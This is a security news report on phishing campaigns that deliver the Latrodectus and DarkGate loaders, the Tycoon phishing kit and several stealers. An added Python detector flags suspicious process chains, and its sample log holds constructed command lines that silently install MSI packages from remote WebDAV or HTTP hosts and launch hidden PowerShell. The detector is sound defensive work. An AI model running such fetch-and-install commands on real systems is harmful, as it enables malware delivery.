Cybersecurity researchers have observed a spike in email phishing campaigns, beginning in early March 2024, that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware.
“These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file, remotely hosted on a WEBDAV share,” Elastic Security Labs researchers Daniel Stepanic and Samir Bousseaden said.
Latrodectus comes with standard capabilities that are typically expected of malware designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, allowing threat actors to conduct various post-exploitation activities.
An analysis of the latest Latrodectus artifacts has revealed an extensive focus on enumeration and execution, as well as the incorporation of a self-delete technique to delete running files.
The malware, besides masquerading as libraries associated with legitimate software, uses source code obfuscation and performs anti-analysis checks in order to prevent its execution from proceeding further in a debugging or sandboxed environment.
Latrodectus also sets up persistence on Windows hosts using a scheduled task and establishes contact with a command-and-control (C2) server over HTTPS to receive commands that allow it to collect system information; update, restart, and terminate itself; and run shellcode, DLL, and executable files.
Two new commands added to the malware since its emergence late last year include the ability to enumerate files in the desktop directory and retrieve the entire running process ancestry from the infected machine.
It further supports a command to download and execute IcedID (command ID 18) from the C2 server, although Elastic said it did not detect this behavior in the wild.
“There definitely is some kind of development connection or working arrangement between IcedID and Latrodectus,” the researchers said.
“One hypothesis being considered is that LATRODECTUS is being actively developed as a replacement for IcedID, and the handler (#18) was included until malware authors were satisfied with Latrodectus’ capabilities.”
The development comes as Forcepoint dissected a phishing campaign that uses invoice-themed email lures to deliver the DarkGate malware.
The attack chain starts with phishing emails posing as QuickBooks invoices, urging users to install Java by clicking on an embedded link that leads to a malicious Java archive (JAR). The JAR file acts as a conduit to run a PowerShell script responsible for downloading and launching DarkGate via an AutoIT script.
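Both delivery chains described above (an oversized JavaScript file using WMI to invoke msiexec.exe against an MSI on a WebDAV share, and a JAR file that launches a PowerShell script) surface in endpoint telemetry as unusual parent/child process pairs. The following is an added example, not code from the article or from Elastic or Forcepoint, of a small detector that flags those pairs in process-creation events. It assumes each event is flattened to one Key=Value line with Sysmon-style field names (ParentImage, Image, CommandLine); the sample log lines, hostnames and paths in it are constructed placeholders.

```python
# Added example (not from the article, Elastic, or Forcepoint): a process-lineage
# detector for the two loader delivery chains described in the text.
# Assumed input: process-creation events flattened to one "Key=Value" line each,
# with field names modelled on Sysmon Event ID 1. Every sample event below is
# constructed; hosts and paths are placeholders.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # full path of the parent process image
    image: str    # full path of the newly created process image
    cmdline: str  # command line of the new process


# Constructed sample log: lines 1-3 are the patterns the article describes,
# lines 4-5 are ordinary msiexec activity that must not fire.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\System32\wscript.exe Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /i \\203.0.113.10@80\share\update.msi /qn"
ParentImage=C:\Windows\System32\wbem\WmiPrvSE.exe Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec /i http://dav.example.invalid/pkg.msi /quiet"
ParentImage="C:\Program Files\Java\jre\bin\java.exe" Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -c <constructed-stage>"
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec /i C:\Users\alice\Downloads\setup.msi"
ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec /V"
""".strip()

# Key=Value pairs; values may be double-quoted when they contain spaces.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# msiexec handed a UNC/WebDAV path (\\host\share or \\host@port\share) or an
# http(s) URL, i.e. a package fetched from a remote location.
REMOTE_MSI_RE = re.compile(r'(?i)\bmsiexec(?:\.exe)?\s.*?(?:\\\\[\w.@-]+\\|https?://)')

# Parents that should not normally be installing MSI packages.
SCRIPT_OR_WMI_HOSTS = {"wscript.exe", "cscript.exe", "wmiprvse.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> ProcEvent:
    """Parse one flattened event line into a ProcEvent (missing fields -> '')."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return ProcEvent(fields.get("ParentImage", ""),
                     fields.get("Image", ""),
                     fields.get("CommandLine", ""))


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a verdict string for a suspicious parent/child pair, else None."""
    parent, image = basename(ev.parent), basename(ev.image)
    if (image == "msiexec.exe" and parent in SCRIPT_OR_WMI_HOSTS
            and REMOTE_MSI_RE.search(ev.cmdline)):
        return "script/WMI host launched msiexec with a remote MSI (Latrodectus-style chain)"
    if image == "powershell.exe" and parent == "java.exe":
        return "java.exe spawned PowerShell (JAR-to-PowerShell stage, DarkGate-style chain)"
    return None


def scan(log_text: str) -> List[Tuple[int, str]]:
    """Scan a multi-line log and return (line number, verdict) for each hit."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        verdict = classify(parse_line(line))
        if verdict:
            hits.append((lineno, verdict))
    return hits


if __name__ == "__main__":
    for lineno, verdict in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict}")
```

The parent-image check carries the signal: msiexec.exe pulling a package from a UNC or HTTP source is unremarkable when an interactive shell or a signed installer spawns it, but a script host or WmiPrvSE.exe doing so matches the chain the researchers describe. In a real deployment the same two rules would be written in the SIEM's query language against the native process-creation events rather than against flattened text.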
Social engineering campaigns have also employed an updated version of a phishing-as-a-service (PhaaS) platform called Tycoon to harvest Microsoft 365 and Gmail session cookies and bypass multi-factor authentication (MFA) protections.
“This new version boasts enhanced detection evasion capabilities that make it even harder for security systems to identify and block the kit,” Proofpoint said. “Significant alterations to the kit’s JavaScript and HTML code have been implemented to increase its stealthiness and effectiveness.”
These include obfuscation techniques to make the source code harder to understand and the use of dynamic code generation to tweak the code every time it runs, thereby evading signature-based detection systems.
Other social engineering campaigns detected in March 2024 have taken advantage of Google ads impersonating Calendly and Rufus to propagate another malware loader called D3F@ck Loader, which first emerged on cybercrime forums in January 2024, and ultimately drop Raccoon Stealer and DanaBot.
“The case of D3F@ck Loader illustrates how malware-as-a-service (MaaS) continues to evolve, utilizing [Extended Validation] certificates to bypass trusted security measures,” cybersecurity firm eSentire noted late last month.
The disclosure also follows the emergence of new stealer malware families such as Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer, even as the Remcos remote access trojan (RAT) has been observed using a PrivateLoader module to enhance its capabilities.
“By installing VB scripts, altering the registry, and setting up services to restart the malware at variable times or by control, [Remcos] malware is able to infiltrate a system completely and remain undetected,” the SonicWall Capture Labs threat research team said.